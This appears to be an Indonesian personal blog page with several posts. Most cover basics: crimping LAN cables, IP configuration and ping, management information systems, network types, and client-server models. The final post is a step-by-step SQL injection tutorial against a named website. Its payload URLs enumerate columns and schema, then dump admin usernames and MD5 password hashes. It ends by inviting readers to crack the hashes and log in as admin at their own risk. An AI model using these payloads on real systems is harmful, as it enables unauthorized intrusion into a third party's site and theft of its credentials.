Segala sesuatunya sudah diatur jauh sebelum manusia terlahir. Apa yang mesti kita perbuat.? Menangiskah.? Bersyukur dan Berikhtiar dua hal yang mesti dijaga keutuhannya.
Kamis, 03 Desember 2009
Tips Mebangun LAN
- Tang Cramping
- Lan Tester
- Kabel UTP (Unshielded Twisted Pair) / Coaxial (jarang digunakan)
- Connector RJ45 / connector kabel coaxial
- switch-hub
- min 2 buah PC (Personal Computer) beserta LAN Card atau NIC (Network Interface Card)
Lalu kita tentukan susunan kabel UTP yang akan kita gunakan sesuai dengan fungsinya. misalkan kalau kita hendak menghubungkan langsung dari PC-PC maka kita gunakan CROSS, kalau kita hubungkan ke switch-hub lebih dulu, PC-HUB, maka kita gunakan STRAIGHT. jika kita hendak menghubungkan 2 LAN maka HUB-HUB kita gunakan CROSS, kita juga bisa gunakan STARIGHT jika pada salah satu HUB terdapat port uplink.
untuk memudahkan dalam menghapal susunan kabel, kita bisa gunakan slah satu cara yang saya pakai, yaitu STRAIGHT -> OBHC kalau CROSS -> HBOC.
STRAIGHT -> OBHC
O -> putih orange - orange
B -> putih hijau - biru
H -> putih biru - hijau
C -> putih coklat - coklat
CROSS -> HBOC
H -> putih hijau - hijau
B -> putih orange - biru
O -> putih biru - orange
C -> putih coklat - coklat
jika anda memiliki cara yang lain silahkan diterapkan, gak harus seperti diatas.
kemudian silahkan setiap ujungnya diujicoba menggunakan lan tester.
kalau lampu menyala sesuai yang diharapkan, maka anda telah berhasil dalam proses cramping. silahkan dipasang pada lan card PC anda.
untuk mengatur IP maka yang kita pikirkan adalah berapa no group IP yang digunakan pada LAN anda. biasanya untuk jaringan lokal menggunakan group IP 172.17.X.X, 192.168.X.X 202.168.X.X atau 10.10.X.X.
untuk jaringan lokal, minimal yang diatur adalah :
IP address : 192.168.1.2 (misal)
Subnet mask : 255.255.255.0 (misal)
untuk default gateway dapat anda isi jika anda hendak menghubungkan jaringan lokal anda dengan jaringan luar (baik jaringan lokal lainnya atau internet).
untuk DNS server akan anda isi jika anda terhubung dengan internet. DNS server ini tergantung dengan aturan yang ditetapkan oleh provider, Telkom Speedy, dll.
jika anda sudah mengatur no IP, anda bisa mengecek apakah komputer anda sudah bisa berkomunikasi dengan komputer lainnya, yaitu dengan cara menjalankan perintah ping pada command, seperti ping 192.168.1.3 (perintah ini menghasilkan 4 kali respon), agar terus-menerus memberikan respon kita tambahkan atribut -t (trace), seperti ping 192.168.1.3 -t
Respon yang diberikan ada 3 macam :
1. reply from.......
- komputer anda sudah dapat berkomunikasi dengan komputer tujuan anda.
2. request time out.......
- koneksi jaringan ada masalah dengan komputer tujuan anda.
3. destination unreachable.......
- koneksi jaringan komputer anda ada masalah.
Sistem Informasi Manajemen
Sistem Informasi Manajemen merupakan sistem informasi yang menghasilkan hasil keluaran (output) dengan menggunakan masukan (input) dan berbagai proses yang diperlukan untuk memenuhi tujuan tertentu dalam suatu kegiatan manajemen.
Tujuan Umum
- Menyediakan informasi yang dipergunakan di dalam perhitungan harga pokok jasa, produk, dan tujuan lain yang diinginkan manajemen.
- Menyediakan informasi yang dipergunakan dalam perencanaan, pengendalian, pengevaluasian, dan perbaikan berkelanjutan.
- Menyediakan informasi untuk pengambilan keputusan.
Ketiga tujuan tersebut menunjukkan bahwa manajer dan pengguna lainnya perlu memiliki akses ke informasi akuntansi manajemen dan mengetahui bagaimana cara menggunakannya. Informasi akuntansi manajemen dapat membantu mereka mengidentifikasi suatu masalah, menyelesaikan masalah, dan mengevaluasi kinerja (informasi akuntansi dibutuhkan dam dipergunakan dalam semua tahap manajemen, termasuk perencanaan, pengendalian dan pengambilan keputusan).
Proses Manajemen
Proses manajemen didefinisikan sebagai aktivitas-aktivitas:
- Perencanaan, formulasi terinci untuk mencapai suatu tujuan akhir tertentu adalah aktivitas manajemen yang disebut perencanaan. Oleh karenanya, perencanaan mensyaratkan penetapan tujuan dan identifikasi metode untuk mencapai tujuan tersebut.
- Pengendalian, perencanaan hanyalah setengah dari peretempuran. Setelah suatu rencana dibuat, rencana tersebut harus diimplementasikan, dan manajer serta pekerja harus memonitor pelaksanaannya untuk memastikan rencana tersebut berjalan sebagaimana mestinya. Aktivitas manajerial untuk memonitor pelaksanaan rencana dan melakukan tindakan korektif sesuai kebutuhan, disebut kebutuhan.
- Pengambilan Keputusan, proses pemilihan diantara berbagai alternative disebut dengan proses pengambilan keputusan. Fungsi manajerial ini merupakan jalinan antara perencanaan dan pengendalian. Manajer harus memilih diantara beberapa tujuan dan metode untuk melaksanakan tujuan yang dipilih. Hanya satu dari beberapa rencana yang dapat dipilih. Komentar serupa dapat dibuat berkenaan dengan fungsi pengendalian.
Bagian
SIM merupakan kumpulan dari sistem informasi:
- Sistem informasi akuntansi (accounting information systems), menyediakan informasi dan transaksi keuangan.
- Sistem informasi pemasaran (marketing information systems), menyediakan informasi untuk penjualan, promosi penjualan, kegiatan-kegiatan pemasaran, kegiatan-kegiatan penelitian pasar dan lain sebagainya yang berhubungan dengan pemasaran.
- Sistem informasi manajemen persediaan (inventory management information systems).
- Sistem informasi personalia (personal information systems).
- Sistem informasi distribusi (distribution information systems).
- Sistem informasi pembelian (purchasing information systems).
- Sistem informasi kekayaan (treasury information systems).
- Sistem informasi analisis kredit (credit analysis information systems).
- Sistem informasi penelitian dan pengembangan (research and development information systems).
- Sistem informasi analisis software
- Sistem informasi teknik (engineering information systems).
Jangkauan Aren Jaringan Komputer
Berdasarkan wilayahnya atau letak geografisnya, jaringan komputer dibedakan menjadi 3:
1. Local Area Network (LAN)
LAN menggambarkan suatu jaringan yang menjangkau area yang terbatas, misalnya satu kantor satu gedung, di mana komputer yang mempunyai jaringan fisik berdekatan atau dengan lainnya. Biasanya antarnode tidak jauh dari sekitar 200 m.
2. Metropolitan Area Network (MAN)
MAN merupakan jaringan dengan area lebih luas dari LAN, yang bisa terdiri dari dua atau lebih LAN yang dihubungkan bersama-sama dalam batas-batas kira-kira suatu kawasan metropolitan atau satu kota. Jarak maksimum yang dijangkau MAN kira-kira 80 kilometer.
3. Wide Area Network (WAN)
WAN adalah jaringan yang jangkauan area geografik paling luas, bisa antarpulau, Negara, benua, bahkan bisa keluar angkasa. WAN biasanya sudah menggunakan media wireless, sarana satelit, ataupun kabel serat optic, karena jangkauannya yang lebih luas. Contoh terbaik dan sangat terkenal adalah Internet.
| Jarak antarkomputer | Lokasi/Area | Jenis Jaringan |
| 1 – 10 m | Ruangan | Local Area Network |
| 100 m - <1> | Gedung perkantoran | |
| 1 – 10 km | Kota | Metropolitan Area Network |
| > 10 - <> | Kabupaten, Propinsi | |
| > = 100 km | Negara | Wide Area Network |
| > = 1.000 km | Benua | |
| > = 10.000 km | Planet | Internet |
Fungsi Komputer Dalam jaringan
1. Jaringan Client-Server
Dalam jaringan ini satu komputer berfungsi sebagai pusat layanan (server) dan komputer yang lain berfungsi meminta pelayanan (Client). Sesuai dengan namanya, client/server berarti adanya pembagian kerja pengolahan data antara client dan server. Saat ini, sebagian besar jaringan menggunakan model client/server.
a. Client
Client adalah sebuah sistem komputer atau proses yang meminta sebuah layanan dari sistem komputer atau proses lain. Workstation yang meminta isi dari sebuah file dari server file disebut sebagai client dari file server tersebut.
b. Server
Server bertugas menerima request dari client, mengolahnya, dan mengirimkan kembali hasilnya ke client (Aji Supriyanto, 2005: 296).
Komputer server harus mampu melayani:
1) Request secara simultan dalam jumlah besar.
2) Aktivitas manajemen jaringan.
3) Menjamin keamanan pada sumber jaringan.
Komputer server dalam pelayanannya dibedakan menjadi dua yaitu:
1) Non-dedicated server adalah server yang selain berfungsi sebagai server itu sendiri juga berfungsi sebagai client.
2) Dedicated server adalah server yang memang tugasnya hanya melakukan pelayanan.
2. Jaringan Peer-to-Peer
Dalam jaringan ini tidak ada komputer yang berfungsi khusus, dan semua komputer dapat berfungsi sebagai klien dan server dalam satu saat yang bersamaan.
Perbandingan Peer-to-Peer dengan Client/Server
| Peer-to-Peer | Client/Server |
| Keuntungan | Keuntungan |
|
|
| Kerugian | Kerugian |
|
|
Jaringan Komputer
Sekumpulan komputer dinamakan sebagai jaringan komputer (Computer Network) jika dalam sekumpulan komputer tersebut dihubungkan melalui media fisik dan software yang memfasilitasi komunikasi antara komputer-komputer tersebut. Sehingga memungkinkan pengguna komputer dalam jaringan komputer dapat saling bertukar file/data, mencetak pada printer yang sama dan menggunakan hardware/software yang terhubung dalam jaringan secara bersama-sama.
RANCANG BANGUN SISTEM INFORMASI PELAPORAN
Contoh SQL Injection
target site:
http://www.itmaasia.com/news.php?id=10
udahnya kita test apakah target kita bisa di SQLi ato gk??
caranya cukup kasih tanda ( ' ) / petik satu dibelakang url jadinya
http://www.itmaasia.com/news.php?id=10'
klo keluar tulisan error sql berarti webnya bisa di SQLi.
langkah berikutnya kita cari jumlah kolom. caranya make syntak
order by (jumlah kolom)--
kita terapkan pada site target jadinya
http://www.itmaasia.com/news.php?id=10 order by 300--
kalo ada tulisan :
Unknown column '300' in 'order clause'
itu berarti kolomnya kebanyakan kita pake ilmu ngira" jumlah kolomnya brp? harus pas misal kita kira² target kita punya kolom 26 sehingga
http://www.itmaasia.com/news.php?id=10 order by 26--
error tadi gk keluar.. kita coba lagi make kolom 27
http://www.itmaasia.com/news.php?id=10 order by 27--
dan lagi error gk kluar?? kita coba lagi make kolom 28
http://www.itmaasia.com/news.php?id=10 order by 28--
ternyata error keluar.. jadi kesimpulannya.. target kita tuh pny kolom 27 buah..
setelah kita dapet semua kolom kita urutkan kolom untuk mendapatkan "NOMOR AJAIB" caranya make syntak
depan id kasih tanda ( - )/kurang union select kolom1,2, n
penerapan dalam target kita
http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
maka akan muncul "NOMOR AJAIB" itulah nomor yang kita gunakan untuk inject (oh iya, nomor ajaib ini tidak hanya di badan web, tetapi bisa di title web)
di target kita ngeluarin angka 3 & 11
selanjutnya kita cari versi databasenya.. caranya make syntak
@@Version pada nomor ajaib
penerapan dalam target kita (gw ambil yg 11)
http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,@@Version,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
muncul versi database
5.0.51b-community-nt
[quote]
catatan:
database versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya.[/quote]
langkah selanjutnya kita cari informasi table caranya
memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--
penerapan dalam target kita
http://www.itmaasia.com/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.tables%20where%20table_schema=database()--
nah muncul kan nama² tabel nya ada tabel admin tuh
langkah selanjutnya kita akan mengintip informasi di dalam table admin,
pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'
penerapan dalam target kita
http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where table_name='tb_admin'--
oopppsss... error!
table 'admin' harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..
caranya masuk ke web ini
http://www.swingnote.com/tools/texttohex.php
trus di kolom string tulis tb_admin kemudian convert
kemudian copy hexnya. lalu kita terapkan pada target kita
http://www.itmaasia.com/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_name=0x74625f61646d696e
keluarkan informasi dari tb_admin..
langkah selanjutnya kita cari id_admin & password caranya
group_concat(username,0x3a,password) tambahkan diakhir URL from admin
dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from admin adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama admin..
penerapan dalam target kita
http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,0x3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tb_admin
wakakakakkak... dapet dech informasi login admin dan passwordnya..
sekarang kita akan login sebagai admin, namun user admin telah terenkripsi dengan MD5. cari dah cracknya......
selanjutnya terserah anda..
segala akibat ditanggung sendiri"..
Sumber Tecon Indonesia